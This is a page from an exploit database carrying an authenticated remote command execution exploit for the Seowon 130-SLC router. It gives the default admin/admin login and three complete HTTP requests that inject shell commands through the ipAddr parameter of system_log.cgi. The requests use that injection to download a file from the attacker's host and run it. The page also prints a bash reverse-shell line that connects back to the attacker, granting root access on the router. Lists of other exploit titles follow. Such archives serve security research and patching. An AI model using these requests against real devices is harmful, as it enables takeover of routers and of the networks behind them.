Menu

Search for hundreds of thousands of exploits

"Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)"

Author

Exploit author

maj0rmil4d

Platform

Exploit platform

hardware

Release date

Exploit published date

2020-11-24

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
# Exploit Title: Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)
# Date: 5 Aug 2020
# Exploit Author: maj0rmil4d
# Vendor Homepage: http://www.seowonintech.co.kr/en/
# Hardware Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29
# Version: 1.0.11 (Possibly all versions)

 The default user/pass is admin/admin
 your commands run as root user
 the vulnerablity is on the ipAddr parameter in system_log.cgi

 Usage:

 login to the dashboard.
 setup your listener.
 download the revshell.txt with the RCE
 run the revshell.txt

 * here is the RCE request :

POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
00101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t201802140812
Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
4662; cpe_loginadmin; _lang

CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
&pingTimeout30&pingCount4&ipAddr;id&maxTTLCnt30&queriesCnt3&=
reportIpOnlyCheckboxon&btnApplyApply&T1596644096617


* to get a reverse shell, setup the listener and download the file on the r=
outer then run it .
* the content of the revshell.txt :

bash -i >& /dev/tcp/192.168.1.10/45214 0>&1

* to download :


POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
00101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t201802140812
Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
4662; cpe_loginadmin; _lang

CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
&pingTimeout30&pingCount4&ipAddr;wget http://192.168.1.10/revshell=
.txt&maxTTLCnt30&queriesCnt3&reportIpOnlyCheckboxon&btnApplyApp=
ly&T1596644096617


* to run it :

POST /cgi-bin/system_log.cgi? HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/201=
00101 Firefox/79.0
Accept: */*
Accept-Language: en-US,en;q0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 183
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/diagnostic.html?t201802140812
Cookie: productcpe; cpe_buildTime201802140812; vendormobinnet; =
connTypelte; modelCodeSLC_130G; cpe_multiPdnEnable1; cpe_langen=
; cpe_voip0; cpe_cwmpc1; cpe_snmp1; filesharing0; cpe_switchEna=
ble0; cpe_vlanEnable1; cpe_IPv6Enable1; cpe_foc0; cpe_vpn1; =
cpe_httpsEnable0; cpe_internetMTUEnable0; cpe_sleepMode0; cpe_wlan=
Enable1; cpe_simRestriction0; cpe_opmode1; sessionTime159664408=
4662; cpe_loginadmin; _lang

CommandDiagnostic&traceModetrace&reportIpOnly0&pingPktSize56=
&pingTimeout30&pingCount4&ipAddr;bash revshell.txt&maxTTLCnt30&=
queriesCnt3&reportIpOnlyCheckboxon&btnApplyApply&T1596644096617
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
Release Date Title Type Platform Author
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-08-21 "Seowon SlC 130 Router - Remote Code Execution" webapps hardware maj0rmil4d
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.